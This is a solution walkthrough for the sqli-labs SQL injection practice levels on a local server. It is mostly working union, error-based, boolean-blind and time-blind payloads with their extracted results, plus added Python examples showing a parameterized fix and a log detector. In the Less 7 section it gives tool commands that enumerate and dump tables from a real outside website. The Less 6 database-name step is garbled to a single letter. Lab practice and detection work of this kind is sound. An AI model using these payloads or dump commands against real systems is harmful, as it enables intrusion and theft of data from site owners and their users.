SQL injection practice, using a server I set up myself: 127.0.0.1/sqli/Less-1
Solutions (for some queries the result is appended after the query; keep that in mind when reading)

Less 1
Union-based query
Find the number of columns
?id=1' order by 4%23
?id=1' order by 3%23   (result: 3 columns in total)
Find the display positions
?id=1' and 1=2 union select 1,2,3%23
Find the database name
?id=1' and 1=2 union select 1,2,database()%23   (result: security)
?id=1' and 1=2 union select 1,database(),3%23   (result: security)
Find the table names
?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23   (result: emails,referers,uagents,users)
Find the column names
?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'%23   (result: id,username,password)
Find the field contents
?id=1' and 1=2 union select 1,2,group_concat(username,0x23,password) from security.users%23
(result: Dumb#Dumb,Angelina#I-kill-you,Dummy#p@ssword,secure#crappy,stupid#stupidity,superman#genious,batman#mob!le,admin#1,admin1#admin1,admin2#admin2,admin3#admin3,dhakkan#dumbo,admin4#admin4,admin'##a)
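Added example (not part of this writeup or of sqli-labs): the single-quoted, string-built query that the Less 1 closing character implies, reproduced in Python on an in-memory SQLite table, beside its parameterized form. SQLite has no database() and uses "-- " rather than "#" as the comment token, so the probe selects sqlite_version() and ends in "-- "; the users rows are constructed sample data.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the lab's security.users table (sample rows, not the lab's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return conn

def lookup_unsafe(conn, raw_id):
    # The vulnerable pattern behind Less 1: the id parameter is spliced into the SQL text
    # inside single quotes, so a quote in the input ends the literal and the rest is parsed as SQL.
    sql = f"SELECT id, username, password FROM users WHERE id='{raw_id}' LIMIT 1"
    return conn.execute(sql).fetchone()

def lookup_safe(conn, raw_id):
    # Hardened form: the value is bound as a parameter, so quotes, UNION and comment
    # tokens inside it are compared as data and never reach the parser as syntax.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (raw_id,)).fetchone()

# The writeup's "display position" probe, with SQLite's "-- " comment in place of MySQL's "#"
# and sqlite_version() in place of database().
PROBE = "1' and 1=2 union select 1,2,sqlite_version()-- "

if __name__ == "__main__":
    db = make_db()
    print("normal id, unsafe :", lookup_unsafe(db, "1"))    # (1, 'Dumb', 'Dumb')
    print("probe, unsafe     :", lookup_unsafe(db, PROBE))  # (1, 2, '<sqlite version>'): injected row
    print("probe, safe       :", lookup_safe(db, PROBE))    # None: no row has that literal id
```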

Less 2
Apart from the closing character being numeric (no quote), the approach is the same as Less 1
?id=1 and 1=1%23
?id=1 order by 3%23
?id=1 and 1=2 union select 1,2,3%23
?id=1 and 1=2 union select 1,2,database()%23
?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23   (result: emails,less42,referers,uagents,users)
?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'%23   (result: id,username,password)
?id=1 and 1=2 union select 1,2,group_concat(username,0x23,password) from security.users%23

Less 3
Error-based injection (the xpath / updatexml approach)
?id=1') and 1=1%23
Find the database name
?id=1') and updatexml(1,concat(0x23,database()),1)%23   (result: security)
Find the table names
?id=1') and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23   (result: emails,less42,referers,uagents)
Find the column names
?id=1') and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23   (result: id,username,password)
Find the field contents
?id=1') and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23   (result: Dumb#Dumb,Angelina#I-kill-you,D)

Less 4
Apart from the closing characters being ") the rest is the same as Less 3
?id=1") and 1=1%23
?id=1") and updatexml(1,concat(0x23,database()),1)%23   (result: security)
?id=1") and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
?id=1") and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
?id=1") and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23

Less 5
This level only differs in the page that is displayed; the concrete approach is the same as Less 3
?id=1' and 1=1%23
Find the database name
?id=1' and updatexml(1,concat(0x23,database()),1)%23
Find the table names
?id=1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
Find the column names
?id=1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
Find the field contents
?id=1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23

Less 6
This level again uses the xpath (updatexml) approach
?id=1" and 1=1%23
Find the database name
s
Find the table names
?id=1" and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
Find the column names
?id=1" and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
Find the field contents
?id=1" and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23

Less 7
This level differs from all the previous ones: since it does not echo the database name, table names and so on through errors, we use blind injection based on the lengths of the database name, table names, column names and field values
Boolean-based blind injection
?id=1')) and 1=1%23
Find the length of the database name
?id=1')) and length(database())=8%23
Find the ASCII codes of the database name
?id=1')) and ascii(substr(database(),1,1))=115%23   (result: s)
?id=1')) and ascii(substr(database(),2,1))=101%23   (result: e)
?id=1')) and ascii(substr(database(),3,1))=99%23   (result: c)
?id=1')) and ascii(substr(database(),4,1))=117%23   (result: u)
?id=1')) and ascii(substr(database(),5,1))=114%23   (result: r)
?id=1')) and ascii(substr(database(),6,1))=105%23   (result: i)
?id=1')) and ascii(substr(database(),7,1))=116%23   (result: t)
?id=1')) and ascii(substr(database(),8,1))=121%23   (result: y)
Number of tables
?id=1')) and (select count(table_name) from information_schema.tables where table_schema='security')=4%23
Find the ASCII codes of the table names
?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23
Find the number of columns
?id=1')) and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23
Find the ASCII codes of the column names
?id=1')) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105%23
Find the number of rows
?id=1')) and (select count(username) from security.users)=13%23
Find the field contents
?id=1')) and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68%23
The methods for table names, column names and field values are all alike; since blind injection is tedious, try the union query and the xpath approach first when solving a level
A simpler way is to test with the 小葵 (Xiaokui) tool, for example:
-u "http://www.romanianwriters.ro/s.php?id=1" --dbs
-u "http://www.romanianwriters.ro/s.php?id=1" --table -D "romanian_svc"
-u "http://www.romanianwriters.ro/s.php?id=1" --columns -T "ra_autori" -D "romanian_svc"
-u "http://www.romanianwriters.ro/s.php?id=1" --dump -C"autoportret,biografie,biografie_prev,id,nume,nume_nd" -T "ra_autori" -D "romanian_svc"

Less 8
Same approach as Less 7
?id=1' and 1=1%23
Find the length of the database name
?id=1' and length(database())=8%23
Find the ASCII values of the database name
?id=1' and ascii(substr(database(),1,1))=115%23   (result: s)
?id=1' and ascii(substr(database(),2,1))=101%23   (result: e)
?id=1' and ascii(substr(database(),3,1))=99%23   (result: c)
?id=1' and ascii(substr(database(),4,1))=117%23   (result: u)
?id=1' and ascii(substr(database(),5,1))=114%23   (result: r)
?id=1' and ascii(substr(database(),6,1))=105%23   (result: i)
?id=1' and ascii(substr(database(),7,1))=116%23   (result: t)
?id=1' and ascii(substr(database(),8,1))=121%23   (result: y)
Find the number of tables
?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4%23
Find the ASCII values of the table names
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23   (result: e)
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109%23   (result: m)
Find the number of columns
?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23

Less 9
Time-based blind injection
Find the length of the database name
?id=1' and if(length(database())=8,sleep(3),1)%23
Find the ASCII codes of the database name
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),2,1))=101,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),3,1))=99,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),4,1))=117,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),6,1))=105,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),7,1))=116,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),8,1))=121,sleep(5),1)%23
Find the number of tables
?id=1' and if((select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(5),1)%23
Find the number of columns
?id=1' and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1)%23

Less 10
Same approach as Less 9
?id=1" and if(length(database())=8,sleep(4),1)%23
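Added example from the defender's side (not part of this writeup): the four technique families the levels above use (union, updatexml error-based, ascii/substr inference, sleep-based timing) leave recognisable tokens in the web server's access log, so a log scan can classify each request. The log lines are constructed samples in Apache combined format carrying the writeup's own Less 1/3/7/9 probes as a browser would URL-encode them; IP, timestamp and byte counts are made up.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# One signature per technique in this writeup, plus the information_schema enumeration
# that the table/column steps of every technique rely on.
SIGNATURES = {
    "union": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "error_based": re.compile(r"\bupdatexml\s*\(", re.I),
    "inference": re.compile(r"\bascii\s*\(\s*substr\s*\(|\blength\s*\(\s*database\s*\(", re.I),
    "time_based": re.compile(r"\bsleep\s*\(", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
}

# Apache common/combined format; the request line is "METHOD PATH PROTOCOL".
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(path):
    """Return the sorted technique names whose signature appears in the URL-decoded query string."""
    decoded = unquote_plus(urlsplit(path).query)  # %27 -> ', %23 -> #, %20 and + -> space
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan_log(lines):
    """Return (client ip, request path, techniques) for every request that trips a signature."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a parseable access-log line
        techniques = classify_request(m["path"])
        if techniques:
            hits.append((m["ip"], m["path"], techniques))
    return hits

# Constructed sample log: Less 1 union probe, Less 3 updatexml probe, Less 7 boolean probe,
# Less 9 timing probe, then one benign request.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:01 +0800] "GET /sqli/Less-1/?id=1%27%20and%201=2%20union%20select%201,2,database()%23 HTTP/1.1" 200 731',
    '127.0.0.1 - - [01/Jan/2024:10:00:02 +0800] "GET /sqli/Less-3/?id=1%27)and%20updatexml(1,concat(0x23,database()),1)%23 HTTP/1.1" 200 690',
    '127.0.0.1 - - [01/Jan/2024:10:00:03 +0800] "GET /sqli/Less-7/?id=1%27))%20and%20ascii(substr(database(),1,1))=115%23 HTTP/1.1" 200 612',
    '127.0.0.1 - - [01/Jan/2024:10:00:04 +0800] "GET /sqli/Less-9/?id=1%27%20and%20if(length(database())=8,sleep(3),1)%20%23 HTTP/1.1" 200 640',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 731',
]

if __name__ == "__main__":
    for ip, path, techniques in scan_log(SAMPLE_LOG):
        print(ip, ",".join(techniques), path)
```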